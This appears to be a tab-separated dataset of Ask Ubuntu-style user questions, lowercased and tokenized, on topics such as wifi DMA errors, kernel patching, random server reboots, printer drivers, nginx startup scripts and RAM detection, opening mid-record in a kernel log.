] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 837.972436 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 838.036558 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 838.100608 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 838.112503 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00026e00 [ 838.112533 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 838.176699 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 838.188617 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 838.188646 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 838.252692 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 838.264553 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 838.264585 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 841.309136 ] wlan0 : deauthenticating from 08:76 : ff : c8:67 : d0 by local choice ( reason=3 ) [ 841.478857 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 841.490702 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 841.490737 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 841.558863 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 841.570786 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00026800 [ 841.570823 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 841.634987 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 841.646875 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 841.646910 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 841.710992 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 841.774983 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 841.786866 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 841.786896 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 841.851053 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 841.862974 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 841.863006 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 841.927042 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 841.938943 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00026e00 [ 841.938974 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 842.003202 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 842.067251 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 842.079114 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 842.079147 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 842.143292 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 842.155151 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00026800 [ 842.155182 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up [ 842.219331 ] ath : phy0 : failed to stop tx dma , queues=0x001 ! [ 842.231204 ] ath : phy0 : dma failed to stop in 10 ms ar_cr=0x00000024 ar_diag_sw=0x02000020 dmadbg_7=0x00006400 [ 842.231232 ] ath : phy0 : could not stop rx , we could be confusing the dma engine when we start rx up any thoughts ? it 's looking like hardware issues .
420930	how to patch kernel to get some hardware working	some info : i have a patch file vaio-full-3.2.2.patch which i downloaded from here . well , if i patch the kernel with it , it is supposed to get some hardware working , such as the light sensor that controls the lcd 's brightness and the keyboard 's backlight and some other things ( see ) . it 's for sony vaio f11 series . my laptop is a f111fx , dual-boot win7/ubuntu 12.04 with kernel : 3.8.0-35-generic . well , what am i supposed to do ? ! : - ) will it work for me ? experienced guys please help me understand what i am exactly gon na do . ( i 'm kinda newbie in linux programming , kernel hacking , etc . i 'm not a beginner programmer though . i know matlab , latex , some c++ and some python but the fact is i have n't worked with linux much . )
420933	manually installed boost is not found by aptitude	i have installed boost libraries 1.55 manually . now i want to install libpcl http : //pointclouds.org/downloads/linux.html . when i want to install the libpcl from terminal like this : sudo apt-get install libpcl-all it wants to download all the old boost libraries of 1.46 . is there a way to tell the aptitude to use manually installed boost library . thanks a lot .
420934	how to install several php versions on ubuntu 13.10 ?	i switched to ubuntu 13.10 and php version is 5.5 . but the cms i use is so far based on php versions 5.3 or 5.4 . i tried phpfarm , phpbrew , php-version - nothing works ! ! i want to know how to install php 5.4 beside 5.5 .
420938	ubuntu server 12.04 random reboot ? nothing in log !	version : ubuntu 12.04.3 lts ( precise ) uname -a : linux sysname 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux we have a few ubuntu servers running in our lab , on some of which we have experienced random reboots . a reboot may happen with a gap of a few days , or may not occur at all . on one machine for example the exact reboot time was `` wed feb 12 12:56 est '' . i have gone through all the logs i could possibly think of , around the time of reboot ( syslog , kernlog , authlog etc ) , but the reboot seems to be occuring out of the blue . no error/warning/panic messages whatsoever in the log , seems like the system just rebooted during a proper normal working state so to speak . sample log at the time of reboot ( feb 12 12:56 ) is as follows : feb 12 12:56:55 sysname vmnet-dhcpd : dhcprequest for 192.168.191.130 from 3e : f0:47:96 : a9:6a via vmnet8 feb 12 12:56:57 sysname vmnet-dhcpd : dhcpack on 192.168.191.130 to 3e : f0:47:96 : a9:6a via vmnet8 feb 12 12:56:57 sysname vmnet-dhcpd : dhcprequest for 192.168.191.141 from 22:9c:0f:78 : c1:83 via vmnet8 feb 12 12:57:08 sysname snmpd [ 9816 ] : connection from udp : [ 10.14.44.27 ] :59568- > [ 10.14.47.114 ] feb 12 12:57:08 sysname vmnet-dhcpd : dhcpack on 192.168.191.141 to 22:9c:0f:78 : c1:83 via vmnet8 feb 12 12:57:08 sysname vmnet-dhcpd : dhcprequest for 192.168.191.141 from 22:9c:0f:78 : c1:83 via vmnet8 feb 12 12:57:08 sysname snmpd [ 9816 ] : connection from udp : [ 10.14.44.27 ] :59568- > [ 10.14.47.114 ] feb 12 12:57:14 snmpd [ 9816 ] : last message repeated 2 times feb 12 12:57:14 sysname vmnet-dhcpd : dhcpack on 192.168.191.141 to 22:9c:0f:78 : c1:83 via vmnet8 feb 12 12:57:14 sysname vmnet-dhcpd : dhcprequest for 192.168.191.141 from 22:9c:0f:78 : c1:83 via vmnet8 feb 12 12:57:18 sysname vmnet-dhcpd : dhcpack on 192.168.191.141 to 22:9c:0f:78 : c1:83 via vmnet8 feb 12 12:57:38 sysname snmpd [ 9816 ] : connection from udp : [ 10.14.44.27 ] :58736- > [ 10.14.47.114 ] feb 12 12:58:45 sysname kerfeb 12 12:56:12 sysname kernel : imklog 5.8.6 , log source = /proc/kmsg started . feb 12 12:56:12 sysname rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1269 '' x-info= '' http : //www.rsyslog.com '' ] start feb 12 12:56:12 sysname rsyslogd : rsyslogd 's groupid changed to 103 feb 12 12:56:12 sysname rsyslogd : rsyslogd 's userid changed to 101 feb 12 12:56:12 sysname rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ] feb 12 12:56:12 sysname kernel : [ 0.000000 ] initializing cgroup subsys cpuset feb 12 12:56:12 sysname kernel : [ 0.000000 ] initializing cgroup subsys cpu feb 12 12:56:12 sysname kernel : [ 0.000000 ] linux version 3.5.0-23-generic ( buildd @ komainu ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 ( ubuntu 3.5.0-23.35~precise1-generic 3.5.7.2 ) all i am able to observe from the log is a little time discrepancy where the log time stamps go from 12:56 to 12:57 and then back to 12:56 and on . other than that i ca n't seem to identify any sort of a message hinting at the cause of reboot . linked below is the syslog file with a few more minutes worth of context : dropbox.com/s/g3cx4gwvwuhndpd/syslog.2 what exactly am i missing here ? kindly help me out in identifying the root cause of these reboots ! note : these ubuntu servers for the most part are running multiple vmware workstation vms
420940	bash script to check if mdadm is installed if not install it	i am currently working on a bash script to create raid5 with 3 disks and one hotspare . i am confused of how to create a script which first check if mdadm exist , if not it will install it and name it md5 . ( raid voulme ) hopefully someone can help me .
420942	ubuntu 12.04.3 not booting after updates	i recently did updates to my ubuntu 12.04.3 and now it wo n't complete the boot-up process . it hangs on the following : fsck de util-linux 2.20.1 /dev/sda1 : clean , 205854/9650176 files , 1675450/38581248 blocks skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher saned disabled ; edit /etc/default/saned starting controller process ... * checking battery state ... [ ok ] fsck de util-linux 2.20.1 /dev/sda1 : clean , 205854/9650176 files , 1675450/38581248 blocks skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting apparmor profiles [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher saned disabled ; edit /etc/default/saned attempting to enter the terminal with ctrl alt f1 does not seem to work . how do i recover from this ?
420946	how to count the total number of the opened files by the users and processes on my machine	i used this command to display a list of all opened files of the current user on my machine : lsof -fn -u teeba| sort | uniq | grep /home the result was : i want to know the total number of the opened files , is there a quick way to get that like adding option for this command , other command or whatever ? thanks in advance
420947	how to make shortcuts	i have been using linux for a like a month and i have felt in love with it , so i as wondering if we can make shortcuts like in windows ?
420950	remove window title / window decorations in gnome 3.10	is it possible to hide window decorations or at least the title bar in gnome 3.10 ? i found an extension called `` maximus '' , but when i try to install it ( and gnome asks whether i want to download it and install ) , nothing happens .
420954	double click not working on files not owned by logged user	i do n't know if this is the normal behaviour , since i usually own all files that i use . i can not open files that are owned by another user using double click in nautilus . i can select open with and then select the default program to run it with ( e.g . gedit for text files ) and then it runs normally . my user is in the user group that is assigned to the files and has read/write permissions . is this behaviour normal and can i fix it somehow ?
420956	printer canon mg2120 no color , ubuntu 12.04 , script does n't detect	the mg2120 runs , but nothing is printed to the paper . i found these instructions in ask ubuntu : download and install these drivers : http : //support-sg.canon-asia.com/contents/sg/en/0100392602.html . you 'll have to untar it with tar -xvzf cnijfilter-mg2100series-3.60-1-deb.tar.gz , then install the deb file : sudo dpkg -i cnijfilter-mg2100series-3.60-1-deb . one of the people who followed these instructions noted that : `` one of these files is a script . you need to run the script to get it to work . '' here is what the script reported when i ran it : '' next , register the printer to the computer . connect the printer , and then turn on the power . to use the printer on the network , connect the printer to the network . when the printer is ready , press the enter key . searching for printers ... # ========================================================= # # select printer # ========================================================= # select the printer . if the printer you want to use is not listed , select update [ 0 ] to search again . to cancel the process , enter [ q ] . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 ) update -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - could not detect the target printer . '' i found a .deb folder when i untarred it -- in the resulting folder there are folders named `` packages '' and `` resources '' and the script file ; in the `` packages '' folder there are two debs for an i386 machine and two for an amd . i tried to run the .deb for i386 so that software center would install it , but the center started as if i had not clicked the file ; the center just started as if i opened the sc from the launch bar . can someone get this printer functioning ? thanks for your time and help . i have 12.04 .
420957	network is disabled after upgrading from 12.10 to 13.10	i previously ran in ubuntu 12.10 as a dual boot with windows xp . i upgraded ubuntu to 13.10 in this dual boot configuration . now networking is disabled . i have access to the internet and email just as before . however , since the upgrade to 13.10 , from ubuntu i can no longer gain access to the files on the windows partition where all of my work is stored . will getting the network manager to run restore this capacity ? how does one get networking to run again ? i am very new to ubuntu and would like to eventually run it as my only os . ok , the network manager does n't have influence on accessing files on another partition . also , i can not open files on my thumb drive . it shows up in `` places '' but i am not allowed access to it . where can i find out more about changing permission to access my files on a thumb drive or the rest of the windows partition ? i want to solve that issue , but still am interested in getting the network manager to run .
420958	openpgp smart card fails after card reinsertion	i am expirimenting with an openpgp smart card . things work great except for the following : plug in smart card and turn on computer '' gpg -- card-status '' shows the card everything works as it should '' ssh-add -l '' shows my card key remove the card '' ssh-add -l '' still shows my card key as expected , but i ca n't use it since it 's unplugged . plug in the smart card '' ssh-add -l '' shows no identities and `` gpg -- card-status '' throws an error . a work around is to log out and log back in . how can i get gpg-agent to recognize my card after it 's been removed and plugged back in ? i am using gpg-agent for gpg and ssh . thanks !
420959	how to configure two optional network interfaces ?	we have two different network configurations for machines deployed to client sites . those who should use dhcp for everything and those who should have static configs . all of these machines also have two ethernet jacks . what i would like to do is set them up such that both jacks are configured in such a way that `` jack 1 '' would be static and `` jack 2 '' would be dhcp-driven . i tried to use the following , but after putting it in and rebooting the machine neither interface was working : # /etc/network/interfaces # loopback interface auto lo iface lo inet loopback # static interface allow-hotplug eth0 iface eth0 inet static address 192.168.0.254 netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.0.1 dns-nameservers 192.168.0.1 # dynamic interface allow-hotplug eth1 iface eth1 inet dhcp what am i not understanding ?
420962	turn off monitor and make it stay that way	my monitor does not have a turn off button , so i want a short-cut key that exactly replicates that behaviour . i currently use xset dpms force off but it turns on to every possible event mouse or keyboard , but it is not good as my mouse may easily move but i still do n't want the monitor to turn on ( i.e . when listening to music )
420965	how to modify behavior of workspace navigator in gnome 3.10 ?	with gnome 3.10 , how can i change the default behavior of the workspace navigator ? the default is an up / down navigator without circular switching ( i.e. , moving from down from the bottom-last workspace does not bring me to the top-most workspace ) ? also , i would prefer left-right to up-down .
420969	ubuntu install failed : `` reboot and select proper boot device ''	i am trying to install linux for the first time . i downloaded ubuntu 12.04.4 and put it on a fat32 flash drive using rawrite 32 . i set my boot priority to boot from usb , plugged in the drive , and restarted my computer . after the bios post , i get a black screen with the following message : `` reboot and select proper boot device or insert boot media in selected boot device and press a key '' . any help with this would be very much appreciated .
420971	trying to use the minecraft installer	i just got ubuntu 13.10 today and i am trying to install minecraft , i saw the way that is suggested here : how to correctly install and troubleshoot minecraft ( client ) and tried it and it worked till when i opened minecraft , it would show that it was running , but i could n't see minecraft its self . did i forget to type a command that shows minecraft on my computer ?
420973	ubuntu not connecting to wifi sometimes	so i am using ubuntu 13.10 on my lenovo u310 laptop and i am having some problems with wifi on it . wifi usually works fine , it 's just that the model has a poor placement of the chip or something so i need to be really near the router . but sometimes when i wake my laptop from sleep mode , it will not connect to any wifi for some reason . i have tried to disable wifi and networking when that happens , but it fixes nothing . only way to get to connect again is to restart the computer . why does this happen and how can i fix it ? restarting computer every time for it seems a bit extreme i think .
420975	compiz on lubuntu	i installed compiz on my lubuntu and some other packages like compiz-plugins and ... . when i run compiz -- replace all window borders ( title bar etc . ) go away . what 's the problem ? what should i do ? how can i run it correctly ? i also run xcompmgr -n , so i can have transparency on some apps like synapse and terminal .
420976	virtualbox nginx service wo n't start on startup , but can be activated through terminal	my normal os is windows 7 64-bit , but i 'm running virtualbox with the latests release of ubuntu installed . i 'm trying to use the vm as my web server as developing a rails application on a windows box is troublesome at best . i 've got it to the point where all the services operate normally and i 'm browsing/updating just fine . i 've installed nginx and i can start/stop the service just fine through the terminal . however i 've added the nginx start script ( below ) to the init.d directory and added it to startup via sudo update-rc.d nginx defaults , but it just wo n't run at startup . at all . the nginx file is executable and the owner is root ( same as my mysql service which is working ... ) # ! /bin/sh # # # begin init info # provides : nginx # required-start : $ all # required-stop : $ all # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : starts the nginx web server # description : starts nginx using start-stop-daemon # # # end init info path=/etc/nginx/sbin : /sbin : /bin : /usr/sbin : /usr/bin daemon=/etc/nginx/sbin/nginx name=nginx desc=nginx test -x $ daemon || exit 0 # include nginx defaults if available if [ -f /etc/default/nginx ] ; then . /etc/default/nginx fi set -e case `` $ 1 '' in start ) echo -n `` starting $ desc : `` start-stop-daemon -- start -- quiet -- pidfile /etc/nginx/logs/ $ name.pid \ -- exec $ daemon -- $ daemon_opts echo `` $ name . '' ; ; stop ) echo -n `` stopping $ desc : `` start-stop-daemon -- stop -- quiet -- pidfile /etc/nginx/logs/ $ name.pid \ -- exec $ daemon echo `` $ name . '' ; ; restart|force-reload ) echo -n `` restarting $ desc : `` start-stop-daemon -- stop -- quiet -- pidfile \ /etc/nginx/logs/ $ name.pid -- exec $ daemon sleep 1 start-stop-daemon -- start -- quiet -- pidfile \ /etc/nginx/logs/ $ name.pid -- exec $ daemon -- $ daemon_opts echo `` $ name . '' ; ; reload ) echo -n `` reloading $ desc configuration : `` start-stop-daemon -- stop -- signal hup -- quiet -- pidfile /etc/nginx/logs/ $ name.pid \ -- exec $ daemon echo `` $ name . '' ; ; * ) n=/etc/init.d/ $ name echo `` usage : $ n { start|stop|restart|reload|force-reload } '' > & 2 exit 1 ; ; esac exit 0 fyi , i know the normal install directory for nginx is /opt/nginx/sbin but on my system it 's actually /etc/nginx/sbin . so that is n't what 's wrong . running sudo pgrep nginx right after booting to the desktop yields no results , but i can start the service using sudo /etc/init.d/nginx start and it works just fine . on subsequent calls to sudo pgrep nginx , i get the pids of the nginx processes . why is n't this working ?
420977	graphics problem with lubuntu 13.10 on amilo pro v2020	i installed lubuntu 12.04 and upgraded to 13.10 . i noticed that in both chrome and firefox flash causes some very weird artifacts and behaves strangely . also i am getting edid checksum error on boot . the machine i am using is fujitsu siemens amilo pro v2020 , using intel速 82852/82855 gm integrated graphics . when i had ubuntu 12.04 installed , flash worked flawlesly . here 's the output of lspci -v : ... 00:02.0 vga compatible controller : intel corporation 82852/855gm integrated graphics device ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : fujitsu technology solutions device 106a flags : bus master , fast devsel , latency 0 , irq 16 memory at d8000000 ( 32-bit , prefetchable ) [ size=128m ] memory at e0380000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at ec00 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:02.1 display controller : intel corporation 82852/855gm integrated graphics device ( rev 02 ) subsystem : fujitsu technology solutions device 106a flags : bus master , fast devsel , latency 0 memory at d0000000 ( 32-bit , prefetchable ) [ size=128m ] memory at e0300000 ( 32-bit , non-prefetchable ) [ size=512k ] capabilities : < access denied > ... here is kern.log for the edid checksum errors and here is a screenshot showing an example of the behavior of flash with a youtube video ( and an advert next to it ) . as i said , when i had ubuntu 12.04 installed flash did n't behave like this . any ideas for fixing this ?
420980	sound not functioning on dell l421x with ubuntu 12.04	i 've been struggling with getting the sound to work on this dell xps14 laptop for days now , and the closest i 've come to getting anything to work is the machine acknowledging the hdmi port as a sound output device when i have my monitor plugged in through a dvi - > hdmi cable , but when it 's the laptop on it 's own no audio devices are recognized at all . when i check lspci i only get the following audio device : 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) the dell website only has the realtek audio alc3260 driver listed along with a wireless music driver , so i 'm making the assumption that this may have something to do with the problem . i 've done pretty much everything i 've seen listed as a solution for sound problems on 12.04 before coming to this conclusion ( disabling pulseaudio , reinstalling pulseaudio , checking the alsamixer settings , etc . ) , as well as adding the alsa-daily repo and trying to install the most recent build for my kernel ( currently 3.2 ) , and i 'm just not having any luck .
420981	how do i save terminal output to a file ?	how do i save the output of a command to a file ? is there a way without using any software ? i would like to know how .
420986	copy or export remmina remote desktop files to another ubuntu install	is there a way to do a bulk copy or export of all my remmina connections ? i have the option to export one by one , but with 50 connections this seems ridiculous . i tried looking for a connections file , or conf file , or something similar but can not find anything . sudo find / -name 'remmina ' only returns four results : /usr/share/menu/remmina /usr/share/doc/remmina /usr/bin/remmina /usr/lib/remmina ... but none of them contain any connection files/entries : (
420991	install autoconf 2.69 on ubuntu 12.04	the default version of autoconf in 12.04 is version 2.8 . how can i upgrade to autoconf 2.9 ?
421000	how to list all the pids and names of all the runing processes	i know that there is this command : ps aux to get all info about the running processes .. but i need only the names and ids for these processes , is there any command can list the processes ids or names only ? thanks
421001	hp g62 touchpad	i have a hp-g62 with a synps/2 synaptics touchpad . while i was using windows 8 , i could use 3 fingers to swipe trough photos . is there anything like a driver , so i could map the 3-finger swipe ? in windows there was a special program for that
421002	remove grub from blank hdd	i was getting rid of linux on a spare hdd i have laying around and i asked a friend to remove it and he messed up and formatted the entirething without getting rid of grub . the drive isnt showing up on any systems and i cant boot to it without crashing my new rig . please help .
421007	ubuntu touch on a nexus 4 with otg support	we would like to use a smart-phone as an interface for our scientific instruments ( instruments have their own power source ) . we already use the c++ driver library under various linux distribution and managed to successfully compile them in the ubuntu phone emulator as well . now , we would like to connect our instrument to a nexus 4 with ubuntu touch . in order to connect our instrument with the nexus we need a usb otg connection . for android , the otg was disabled in 4.2.2 , but enabled in 4.3 . before we proceed , we have two questions : does anyone know if otg works on the nexus 4 with ubuntu touch/ has anyone tested it ? our driver libraries use the libusb library.. should we expect some problems here ? thanks in advance .
421008	accessing windows 7 qemu/kvm virtual machine on portable via spice from another machine	i am running lubuntu 13.04 on a samsung series 9 laptop . i installed windows 7 as a virtual machine running under qemu/kvm . i am able to display the virtual machine from lubuntu on the host laptop by running from the terminal spicec -p 127.0.0.1 -h 5900 . i would like to be able to display the virtual machine from another lubuntu workstation but can not figure out how to do so since the 127.0.0.1 ip address is obviously the local loopback address . i have run arp -an on the host machine under lubuntu and have tried all of the addresses provided by the arp -an command ; i either got connection refused or connection timed out . i am not using bridging ( yet ) i but am instead using the virtual network default nat with device model rtl8139 . i suspect i need to use network bridging but am concerned that since i use the laptop at both my home office , at my customer 's office , and at the university ( at which i teach part time ) the addresses would need to be different and it would be a real pain in the neck . my questions are : is there a way to configure the qemu/kvm nat table so that i could just set the -h opicion of spicec to my laptop to a particular port that would be forwarded to the virtual machine ? is there some other approach i can use thanks . . . phil
421014	share an audio playback stream through a live audio ( video ) conversation like skype	in conversations using skype , i often want to share sound output ( e.g . of a youtube video ) with other people i am talking with . so i am looking for a way to route the output to the recording input ( so that the other members hear the sound output ) , but i can still hear the output myself . furthermore i want still be able to speak with them while sharing the sound output with them . how would i do that ? i would be very thankful ! part of my question has been answered here : how to pass/record audio output as an input device ? ( but it only allows for setting the output stream as input , without overlapping the real microphone )
421015	low on battery mode	on my lenovo laptop with windows installed , when my battery was almost empty , it went in sleep ( or some sort of sleep mode ) . so that if i gave it power again , it restarted back to windows with all my stuff still open . but on ubuntu it 's just uses it till it 's empty . does ubuntu has some similar sort of option ? btw : a small second question ; when i press the ' button , i need to press the spacebar to let it be displayed . is it possible to just let it be showed when i pressed it ? thnx in advance
421017	ubuntu - shortcut ctrl + space causes conflict in eclipse	after i updated ubuntu a new keyboard shortcut appears : ctrl + space and i use that shortcut in eclipse to complete commands , and is very practical . rather than complete the command appears to me a window to switch the keyboard layout ( pt_br brasil or en_us usa ) . my keyboard layout uses the brazilian and i do not want to change . but i want to know if you have to change this shortcut to not give more conflict with eclipse . can someone help me ?
421022	mysterious files and possible virus on ubuntu 12.04.2 server	it services at my institution discovered our server sending out spam emails and flagged it as compromised . further investigations suggest that it is indeed infected with a virus . for instance , there is a mysterious file : /bin/zcut which when run prints w e l c o m e master and opens a super user terminal . i have run sudo clamav on the /sys directory and observed clamav fail to open many files , encountering various errors and `` permission denied '' s. for example , the file /sys/module/psmouse/uevent seems to be restricted even to the admin account . i am fairly certain i am dealing with a virus here and i just wanted suggestions on proceeding . i would like to make as much known about the virus to the community before purging the system .
421024	pptpd help please	i followed this guide , and i ca n't work out what i have done wrong . i noticed as this is a vps i am using that it has no ethernet device and ifconfig did n't show one either , is that the problem maybe ? and if so , how do i fix it ? getting a new error now : http : //i.imgur.com/chmdoo5.png
421025	why is the screen black when the monitor first receives a signal after inactivity ?	i have my computer set to turn the screen off after a period of inactivity . if i move my mouse slightly the monitor will indicate that it is receiving a signal and the backlighting will come on , but the screen is still black . when left like this for around five seconds , the monitor will indicate that it is no longer receiving a signal . moving the mouse again at the black screen instead of waiting causes the screen to come on fully . pressing a key when the screen is `` asleep '' ( e.g . the screen is off ) will cause the screen to come on fully , but it does briefly show a black screen after receiving a signal . this seems to indicate that there are two separate actions which happen to `` wake '' the screen . if so , what are they , and why does it work like this ? i have observed this to occur on several different computers with ubuntu 13.04 and 13.10 using unity . my main computer has a gtx 660 ti with nvidia-319-updates installed and is hooked up to a lcd monitor and a lcd hdtv via dvi and hdmi respectively .
421026	setting up a displaylink touch screen in ubuntu 21.04	i have a mimo magic touch 10 '' touch screen usb monitor . i have the touch driver working and the it displays the shutdown info . but while i am using the computer it only shows green . how do i fix this ? i am using ubuntu 12.04 , with a 3.11.0-15 kernel . here is my xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 331.20 ( buildmeister @ swio-display-x86-rhel47-05 ) wed oct 30 18:20:53 pdt 2013 section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' # generated from default endsection section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' screen 1 `` displaylinkmonitor '' leftof `` screen0 '' option `` xinerama '' `` off '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` nologo '' `` true '' endsection # # # # # # # # # # # # # # # displaylink stuff # # # # # # # # # # # # # # # section `` device '' identifier `` displaylinkdevice '' driver `` displaylink '' option `` fbdev '' `` /dev/fb0 '' endsection section `` monitor '' identifier `` displaylinkmonitor '' endsection section `` screen '' identifier `` displaylinkscreen '' device `` displaylinkdevice '' monitor `` displaylinkmonitor '' subsection `` display '' depth 16 modes `` 800x480 '' endsubsection endsection # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # section `` files '' modulepath `` /usr/lib/xorg/modules '' modulepath `` /usr/lib/xorg/modules/drivers '' endsection anyone know what i am doing wrong ? ? ?
421027	how to migrate from windows live photogallery to digikam ?	i 'm thinking about moving from windows 8.1 to ubuntu . i have been very happy with the windows live photogallery application for managing my photos . i have a simple folder structure having one folder per year with several subfolders . i also tagged people , locations , descriptions and used the rating system a lot . now i am not sure how i could best move these images to ubuntu without loosing tags and ratings . i have read about digikam and it sounds very promising . but i could not find any information what happens when i import a photo library from a windows system . do i have to do some additional work to migrate from live photogallery to digikam ? i do n't want to lose my tags and ratings .
421031	chrome os-style display manager	this is what the login screen looks like on chrome os . is there anyway to make the login screen look similar to this , or any display manager which i can customise to look like this ?
421033	determining the name of the host currently connected via ssh	when logging in via ssh , i 'd like to know , during the execution of .bashrc , the name of the host that is connecting . ubuntu server shows the prompt : last login : fri feb 14 11:34:55 2014 from somehost.local ... so this information is available somewhere . how can i access it ?
421034	suggestion , reset clock on shutdown	i am using ubuntu 13.10 in dual boot with win 7 . ubuntu sets the clock to utc time which messes with microsofts little brain and means i have to fix the time when going into windows . ubuntu can check if the time was utc on startup and if not , reset it back to windows compatible time on shutdown/restart . i have tried setting a windows task to run the internet time setting on log-in , with the system user , but it does not work .
421035	lubuntu does n't detect all the ram ( just 1gb of 1,5gb	i installed lubuntu in a thinkpad x40 laptop . the os runs pretty well but it 's not detecting ( and using ) all the ram installed . the x40 has 512mb of internal ram memory and an additional module of 1gb . after installing lubuntu i had been using in the laptop windows xp for a long period of time and it detected all the ram ( 1.5gb ) so i assume that the ram it 's not malcfuntioning . some data from terminal : ~ $ uname -a linux 3.2.0-58-generic # 88-ubuntu smp tue dec 3 17:40:43 utc 2013 i686 i686 i386 gnu/linux ~ $ free -m total used free shared buffers cached mem : 992 895 97 0 25 482 -/+ buffers/cache : 387 605 swap : 2860 0 2860 ~ $ grep memtotal /proc/meminfo memtotal : 1016400 k i installed the 32-bit version ( actually i installed lubuntu because the system did n't allow me to install ubuntu as a result of not being able to run a pae kernel ) . as far as i know lubuntu has a non-pae kernel however it seems that it 's not able to detect all the ram . i found what it seems to be the solution for the problem but involves recompiling the kernel . i do n't know how to recompile a kernel , but i guess i will be able to replace the kernel with another that works . anyone knows if there is any non-pae lubuntu kernel capable of detecting more than 1gb ram ? it would be possible to update the kernel to another non-pae kernel that detects the 1.5gb ? here i found what it seems to be a solution but ( as i said , it seems to require recompiling the kernel ) [ http : //archive09.linux.com/feature/119287 ] [ 1 ]
